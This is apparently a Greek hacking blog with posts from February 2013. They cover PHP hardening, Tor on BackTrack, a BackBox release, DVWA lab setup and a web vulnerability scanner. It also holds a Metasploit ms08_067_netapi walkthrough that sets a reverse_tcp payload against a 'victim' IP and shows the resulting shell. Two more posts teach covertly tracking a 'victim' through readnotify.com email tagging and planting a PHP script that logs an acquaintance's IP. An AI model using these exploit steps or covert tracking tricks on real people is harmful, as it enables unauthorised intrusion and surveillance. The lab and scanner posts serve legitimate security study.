Θέτοντας την μεταβλητή αυτή false, δεν επιτρέπεται σε κάποιον να εκτελέσει ένα πρόγραμμα σε απομακρυσμένο server.

  • safe_mode = true
H παραπάνω μεταβλητή έχοντας την τιμή true δεν θα επιτρέψει σε κάποιον να
εκτελέσει συναρτήσεις του στυλ system(),exec() κλπ. Δηλαδή συναρτήσεις που
εκτελούν εντολές του λειτουργικού συστήματος. Η συγκεκριμένη όμως μεταβλητή δεν υποστηρίζεται στη Php 6.0. Το σκεπτικό είναι ότι η Php δεν πρέπει να ασχολείται με τόσο «συστημικά ζητήματα» τα οποία μπορούν να επιλυθούν από το security του ίδιου του λειτουργικού (π.χ. με τον καθορισμό access rights κλπ - http://us2.php.net/manual/en/features.safe-mode.php).

  • Χρησιμοποιείτε στα προγράμματα σας την συνάρτηση της php file_exists(). Με αυτόν τον τρόπο μπορείτε να ελέγχετε αν υπάρχει το αρχείο που θα κληθεί να εκτελεστεί στον τοπικό σας δίσκο. Αν το αρχείο δεν υπάρχει στον τοπικό δίσκο αλλά υπάρχει σε κάποιον απομακρυσμένο server, η συνάρτηση θα επιστρέψει false!Για περισσότερες και πιο «ζουμερές» λεπτομέρειες ανατρέξτε στο

http://us2.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen
http://us2.php.net/manual/en/features.remote-files.php

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Κυριακή 24 Φεβρουαρίου 2013

Βρείτε πληροφορίες για τον οποιοδήποτε!

Σε αυτό το post θα σας δείξω πως μπορείτε να πάρετε πληροφορίες σχετικά με κάποιον μέσω του email του.

Πάρα πολύ χρήσιμο αν ξέρεις πως να χρησιμοποιήσεις τις πληροφορίες που σου δίνει! Για να το κάνετε και εσείς είναι πάρα πολύ εύκολο απλά γίνεστε μέλος σε αυτή την σελίδα.
Για περισσότερη ασφάλεια θα σας συνιστούσα να χρησιμοποιήσετε ψεύτικο email. Η διαδικασία είναι πολύ απλή απλά Πρώτα γίνεστε μέλος στην σελίδα που είδατε πιο πάνω, Δεύτερον Συνδέεστε στον λογαριασμό email με το οποίο έχετε γραφτεί στην σελίδα, Τρίτον στέλνετε ένα email στο θύμα σας και στο τέλος προσθέτετε .readnotify.com πχ victim@hotmail.com.readnotify.com Μην φοβάστε το .readnotify.com δεν θα εμφανιστεί στο θύμα σας έτσι δεν υπάρχει περίπτωση να το καταλάβει με τίποτα! Για να πάρετε πληροφορίες θα δείτε ένα email από το email του θύματος σας με όλες τις πληροφορίες του εκεί ή μπορείτε να συνδεθείτε με τον λογαριασμό σας στο http://www.readnotify.com/ το μόνο κακό είναι ότι μπορείτε να στείλετε μονό 25 email ή να πληρώσετε τι πειράζει όμως όταν λήξει φτιάχνετε καινούριο λογαριασμό.

Σάββατο 23 Φεβρουαρίου 2013

Εγκατάσταση του Τοr στο BackTrack 5 R3


Σε αυτό το tutorial θα εξηγήσουμε πως γίνεται η εγκατάσταση του Tor στο Backtrack 5 R3 αλλά και σε οποιοδήποτε BackTrack. Πρώτα απ' όλα να αναφέρουμε ότι το Tor είναι ένα εργαλείο που μας παρέχει ανωνυμία στο διαδίκτυο. Με άλλα λόγια με το Tor μπορούμε να σερφάρουμε στο ιντερνετ με ασφάλεια χρησιμοποιόντας άλλη ΙΡ. Το παραπάνω link δείχνει αναλυτικά τη διαδικασία εγκατάστασης του στο BackTrack.

Α) Πρώτα απ' όλα πρέπει να κατεβάσουμε το αρχείο από την ιστιοσελίδα διανομής του που είναι https://www.torproject.org/.

Β) Στη συνέχεια ανοίγοντας ένα terminal πληκτρολογούμε:

tar -xvzf (αντιγραφή και επικόλληση το πλήρες όνομα του αρχείου που κατεβάσαμε)
Με αυτή την εντολή θα μας το αποσυμπιέσει το αρχείο στην επιφάνεια εργασίας.

Γ) Επόμενο βήμα είναι να ανοίξουμε το φάκελο του αρχείου που αποσυμπιέσαμε και να ανοίξουμε το αρχείο με όνομα tor-browser_en US. Θα μας εμφανίσει σφάλμα στο άνοιγμα του. Για να διορθώσουμε το σφάλμα επιλέγουμε το κείμενο που μας έβγαλε με το σφάλμα και πατάμε αντιγραφή.

Γ) Μετά πατάμε δεξί κλικ πάνω στο εικονίδιο με το όνομα tor-browser_en US. Επιλέγουμε Open to --> gedit (έγγραφο κειμένου)
Στη συνέχεια θα μας ανοίξει ένα κωδικοποιημένο απλό έγγραφο κειμένου και επιλέγουμε την καρτέλα Search-->Find και στο πεδίο με όνομα Search to πατάμε επικόλληση το κείμενο του σφάλματος για να μας το εντοπίσει στο πεδίο.

Δ) Αφού μας βρεί το σημείο που ψάχνουμε αντικαθιστούμε το τρέχον κείμενο με ''Τοr is started'' και σβήνουμε την από κάτω γραμμή που έχει την εντολή exit. Αποθηκεύουμε και κλείνουμε το έγγραφο.

Ε) Τέλος πατάμε κλίκ για να ανοίξουμε το tor-browser_en US. Μας εμφανίζει στην οθόνη '' Τοr is started'' και μας ανοίγει το Tor. Παρακάτω παραθέτω ένα σχετικό video που δείχνει τη διαδικασία εγκατάστασης του Tor...

Παρασκευή 22 Φεβρουαρίου 2013

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_067_netapi exploit - Backtrack 5 R1


Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Πρώτα απ όλα πρέπει να έχουμε εγκατεστημένο το BackTrack 5 R1 στον υπολογιστή μας. Στη συνέχεια ανοίγουμε ένα τερματικό και ακολουθούμε τη σειρά εντολών που αναφέρω παρακάτω:
Ανοίγω ένα τερματικό...
Terminal:
root@bt:msfconsole <-|
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <-|

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <-|
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <-| (victim ip)
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <-|
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <-| (attacker ip)
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <-|

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

BackBox Linux 3.01 PenTesting Distro



Η ομάδα BackBox κυκλοφόρησε την ενημερωμένη έκδοση του BackBox Linux, 3.01. Αυτή η έκδοση περιλαμβάνει χαρακτηριστικά όπως το Linux Kernel 3.2 και το Xfce 4.8.
Το BackBox είναι μια έκδοση Ubuntu που διαθέτει εργαλεία ελέγχου & τρόπου ηλεκτρονικής διείσδυσης και αξιολόγησης αδυναμιών. Με κύριο γνώμονα την ασφάλεια το Backbox έχει προσανατολισμό την διάθεση ενός ολοκληρωμένου εργαλείο ελέγχου δικτύων πληροφορικής και ανάλυσης συστημάτων.


Νέα χαρακτηριστικά:

  • Νέα και ενημερωμένα εργαλεία hacking (π.χ. backfuzz, beef, bluediving, cvechecker, htexploit, metasploit, set, sqlmap, websploit, weevely, wpscan, zaproxy κ.α.)
  • Βελτίωση του συστήματος 
  • Upstream components  
  • Επιδιορθώσεις σφαλμάτων  
  • Ενισχυμένη απόδοση
  • Βελτιωμένο μενού ελέγχου
  • Βελτιωμένοι Wi-Fi dirvers (συμβατότητα/υποστήριξη συσκευών -ενημερωμένη έκδοση aircrack)
Τα ISO (32bit & 64bit) μπορείτε να το κατεβάσετε από Εδώ

Πέμπτη 21 Φεβρουαρίου 2013

Damn Vulnerable Web App

Σε αυτό το tutorial θα δούμε πως μπορείτε μέσω του xampp/lampp να τρέξετε μια τρωτή ιστοσελίδα, ώστε να πειραματιστείτε πάνω στο pentesting χωρίς να βλάψετε κάποια ιστοσελίδα.
Εμείς θα χρησιμοποιήσουμε το Damn Vulnerable Web App. Τι είναι αυτό; Όπως μας λέει και στην επίσημη ιστοσελίδα του:Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Λογικό ακούγεται έτσι; Είναι φτιαγμένο για ειδικούς ασφαλείας, ή για άτομα που θέλουν να ασχοληθούν με αυτόν τον τομέα, έτσι ώστε να δούν σε ποιο επίπεδο βρίσκονται. Επίσης θα καταλάβετε και πως να "κλείσετε" τις τρύπες που δημιουργούν το πρόβλημα. Πηγαίνουμε σε αυτή τη σελίδα και πατάμε το κουμπί "Download" ώστε να κατεβάσουμε τα απαραίτητα αρχεία.


Μόλις τα κατεβάσετε(θα είναι σε μορφή .zip) θα κάνετε αποσυμπίεση τα αρχεία που περιέχοναι μέσα στο συμπιεσμένο αρχείο. Μόλις κάνετε την αποσυμπίεση στον ίδιο φάκελο θα δείτε έναν φάκελο με το όνομα "dvwa" (τα αρχικά από το Damn Vulnerable Web App).
Θα πάτε στον φάκελο Htdocs. Στα windows θα είναι: C:\Xampp\Htdocs και σε Linux -σύμφωνα με το 2ο τιτόριαλ- θα είναι στον φάκελο file system>opt>lampp>htdocs. Μόλις πάτε σε αυτόν τον φάκελο θα διαγράψετε ΟΛΑ τα περιεχόμενά του. Στη συνέχεια θα κάνετε επικόλληση τον φάκελο που βρισκόταν στο αρχείο που κατεβάσαμε(dvwa).

Οπότε στον htdocs θα βρίσκεται μόνο ένας φάκελος με το όνομα dvwa.

Αν δεν μπορείτε να κάνετε την επικόλληση-αντιγραφή τον φάκελο ενώ είστε σε Linux δεν έχετε δώσει τα κατάλληλα δικαιώματα στον administrator. Μετά από αυτή την απλή διαδικασία ξεκινάμε Apache και mysql από το control panel(θα βρίσκεται κάτω-κάτω στον φάκελο xampp σε Windows), ή αν είστε από Linux από το terminal όντας root θα πάτε στην διαδρομή /opt, και από εκεί με την εντολή lampp/lampp start θα ξεκινήσουν τα παραπάνω.
Μόλις πάμε στο "localhost" ή στο "127.0.0.1" από τον browser μας αν τα έχουμε κάνει όλα σωστά θα δούμε αυτό:


ΠΡΟΣΟΧΗ: Αν σας πετάξει κάποιο σφάλμα είναι λόγω του ότι δεν δώσατε δικαιώματα στον administrator(αφορά μόνο χρήστες Linux).

Πατάμε στον φάκελο που βλέπουμε και θα βρεθούμε σε αυτή τη σελίδα:

Εμείς θα πατήσουμε το link ώστε να δημιουργηθεί μια νέα Database. Μόλις πατήσουμε εκεί θα μας εμφανιστεί η κύρια "ιστοσελίδα" που θα είναι ακριβώς έτσι:
 
Πατάμε τώρα στο κουμπί "Create /Reset Database" και είμαστε έτοιμοι!
 
Το μόνο που έχετε να κάνετε τώρα είναι να πάτε στην καρτέλα "DVWA Security" και να αλλάξετε την ασφάλεια από high σε low, έτσι ώστε να ξεκινήσετε απλά. Το Default Username σας θα είναι "admin" και ο κωδικός "password".
Μπορείτε να δοκιμάσετε τις δυνατότητές σας σε Brute Force σε 3 επίπεδα δυσκολίας, Command Execution, CSRF , File Inclusion, SQL Injection, Blind SQL Injection, Upload και XSS. Αν κατεφέρετε να εκμεταλλευτείτε επιτυχώς όλες τις κατηγορίες τότε αλλάζετε το επίπεδο δυσκολίας.Η διαδικασία είναι πολύ απλή και θα σας βοηθήσει στα πρώτα σας βήματα πάνω στο Pen. Testing.

WebVulScan, εργαλείο έλεγχου ευπαθειών σε web εφαρμογές

To WebVulScan είναι μια διαδικτυακή εφαρμογή που ψάχνει για τυχόν ευπάθειες. Είναι γραμμένη σε γλώσσα PHP και μπορεί να χρησιμοποιηθεί για τον έλεγχο ευπαθειών στην ασφάλεια απομακρυσμένων ή τοπικών web εφαρμογών. Καθώς η σάρωση εκτελείται, ο χρήστης ενημερώνεται δυναμικά και λεπτομερώς για τα αποτελέσματα της σάρωσης. Αυτές οι λεπτομέρειες περιλαμβάνουν την κατάσταση της σάρωσης, τoν αριθμό των διευθύνσεων URL που βρέθηκαν στην web εφαρμογή, τoν αριθμό των τρωτών σημείων που βρέθηκαν καθώς και τις λεπτομέρειες των τρωτών σημείων.
Μετά την ολοκλήρωση της σάρωσης, μια λεπτομερής έκθεση σε μορφή PDF μέσω ηλεκτρονικού ταχυδρομείου αποστέλλεται στον χρήστη. Η έκθεση περιλαμβάνει περιγραφές των διαπιστωμένων αδυναμιών, προτάσεις αλλά και λεπτομέρειες σχετικά με τον τρόπο με τον οποίο εκμεταλλεύτηκε την κάθε ευπάθεια ξεχωριστά.

Η ευπάθειες που ψάχνει το WebVulScan είναι οι εξής:

  • Reflected Cross-Site Scripting
  • Stored Cross-Site Scripting
  • Standard SQL Injection
  • Broken Authentication using SQL Injection
  • Autocomplete Enabled on Password Fields
  • Potentially Insecure Direct Object References
  • Directory Listing Enabled
  • HTTP Banner Disclosure
  • SSL Certificate not Trusted
  • Unvalidated Redirects

Επίσης προσφέρει επιπλέον δυνατότητες όπως χαρακτηριστικά αναφέρουμε παρακάτω:
Crawler: ανιχνεύει μια ιστοσελίδα για να εντοπίσει και να εμφανίσει όλες τις διευθύνσεις URL που ανήκουν στη συγκεκριμένη ιστοσελίδα.
Scanner: ανιχνεύει μια ιστοσελίδα και σαρώνει όλες τις διευθύνσεις URL που βρέθηκαν για ευπάθειες.


Ιστορικό Σάρωσης (Scan History): Επιτρέπει στο χρήστη να δει ή να κατεβάσει σε αρχεία PDF, εκθέσεις των προηγούμενων σαρώσεων που πραγματοποιήθηκαν.
Εγγραφή (Register): Επιτρέπει στο χρήστη να εγγραφεί στην web εφαρμογή.


Είσοδος (Login): Επιτρέπει στο χρήστη να συνδεθεί με την εφαρμογή web.


Επιλογές (Options): Επιτρέπει στον χρήστη να επιλέξει ποιες ευπάθειες επιθυμεί να  ελέγξει (σαν προεπιλογή όλα είναι ενεργοποιημένα).
PDF Generation: Δυναμικά δημιουργεί μια λεπτομερή έκθεση σε μορφή PDF.
Report Delivery: Η έκθεση σε μορφή PDF αποστέλλεται μέσω e-mail στον χρήστη ως συνημμένο.


Σύμφωνα με το δημιουργό του, το λογισμικό αυτό αναπτύχθηκε και θα πρέπει να χρησιμοποιείται αποκλειστικά και μόνο για (ethical) ηθικούς σκοπούς. Η χρησιμοποίηση  εργαλείων ελέγχου ασφαλείας, όπως αυτό σε ένα δικτυακό τόπο (web εφαρμογή) θα μπορούσε να προκαλέσει ζημιά. Για να παραμείνει ηθική (ethical) η χρησιμοποίηση τους, θα πρέπει να βεβαιωθείτε ότι έχετε την άδεια των ιδιοκτητών πριν από τη δοκιμή ενός δικτυακού τόπου (web εφαρμογής). Ο έλεγχος της ασφάλειας ενός δικτυακού τόπου (web εφαρμογής) μπορεί να διωχθεί νομικά σε πολλές χώρες, μιας και μπορεί υπό προϋποθέσεις να θεωρηθεί ως επίθεση εναντίον του ιστοτόπου.


Μπορείτε να κατεβάσετε την εφαρμογή εδώ.


Πηγή: secnews.gr

Τετάρτη 20 Φεβρουαρίου 2013

Πως βρίσκω την ΙΡ διεύθυνση ενός υπολογιστή


Σήμερα θα σας δείξω πως μπορούμε να βρούμε την ΙΡ διεύθυνση ενός απόμακρου υπολογιστή για παράδειγμα την ΙΡ ενός γνωστού μας. Πολλοί από εμάς έχουν αναρωτηθεί πώς μπορεί να γίνει αυτό. Στο συγκεκριμένο tutorial θα δείξουμε έναν από τους τρόπους που μπορεί να γίνει. Συγκεκριμένα σε αυτό το άρθρο θα δούμε πως γίνεται μέσα από το chat δηλαδή to msn messenger, yahoo messenger google talk, skype κτλ.

Τι μπορώ να κάνω γνωρίζοντας την ΙΡ διεύθυνση κάποιου υπολογιστή?

  • Μπορεί κάποιος να βρεί διάφορες πληροφορίες για τον υπολογιστή αυτόν όπως να βρεί την τοποθεσία τους τις γεωγραφικες του συντεταγμένες και πολλά αλλα. Ουσιαστικά μπορεί να κάνει το γνωστο "footprinting".
  • Επίσης ένα άλλο που μπορεί να κάνει είναι να αποκτύσει τον έλεγχο "χακάρει" του υπολογιστή και αυτό γίνεται συνήθως με τη χρήση των εργαλείων metasploit και RAT's.
Τι θα χρειαστώ?
  1. PHP script για να "πιάσει" την ΙΡ
  2. ένα .txt αρχείο για να μπορέσει το script να αποθηκεύσει την ΙΡ σε αυτό.
Διαδικασία
Βήμα 1. Ανοίγω ένα έγγραφο κειμένου και αντιγράφω σε αυτό τον παρακάτω κώδικα:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://www.google.com' ) ;
?>

Στη συνέχεια τον αποθηκεύω με το όνομα ip.php Αυτός ο κώδικας γραμμένος σε PHP είναι αυτός που θα κλέψει την ΙΡ του θύματος.

Βήμα 2. Μετά ανόιγω πάλι ένα έγγραφο κειμένου και το αποθηκεύω χωρίς να γράψω τίποτα μεσα του με το όνομα ip_log.txt Για να καταλάβετε αφού τρέξει ο κώδικας και πάρει την ΙΡ του απομακρυσμένου υπολογιστή κάπου πρέπει να την αποθηκεύσει και το κενό αρχείο κάνει αυτή ακριβώς τη δουλειά.

Βήμα 3. Δημιουργώ έναν λογαριασμό σε ένα από τα ακόλουθα free webhosting sites.
www.110mb.com
www.drivehq.com
www.t35.com
www.my3gb.com
η σε οποιοδήποτε άλλο χρησιμοποιώ. Εγώ χρησιμοποιώ τα παραπάνω.


Βήμα 4. Αφού δημιουργήσω το λογαριαμό ανεβάζω τα 2 αρχεία που έφτιαξα στους free webhosting server.

Βήμα 5. Στέλνω το ip.php script στο φίλο μου ή το γνωστό μου που θέλω να πάρω την ΙΡ του και αυτός μόλις το ανοίξει αμέσως η ΙΡ του θα πάει και θα αποθηκευτεί στο στο κενό αρχείο που φτιαξαμε και ανεβάσαμε στον free webhosting server μας.

Επίδειξη:

κάνοντας κλίκ στο ip.php link.Τώρα η IP address αποθηκεύτηκε στο ip_log.txt

Μπορώ να ελέγξω στοιχεία της ΙΡ στη σελίδα www.showmyip.com
Επίσης μπορώ να βρώ την τοποθεσία του υπολογιστή από τη διεύθυνση www.ip2location.com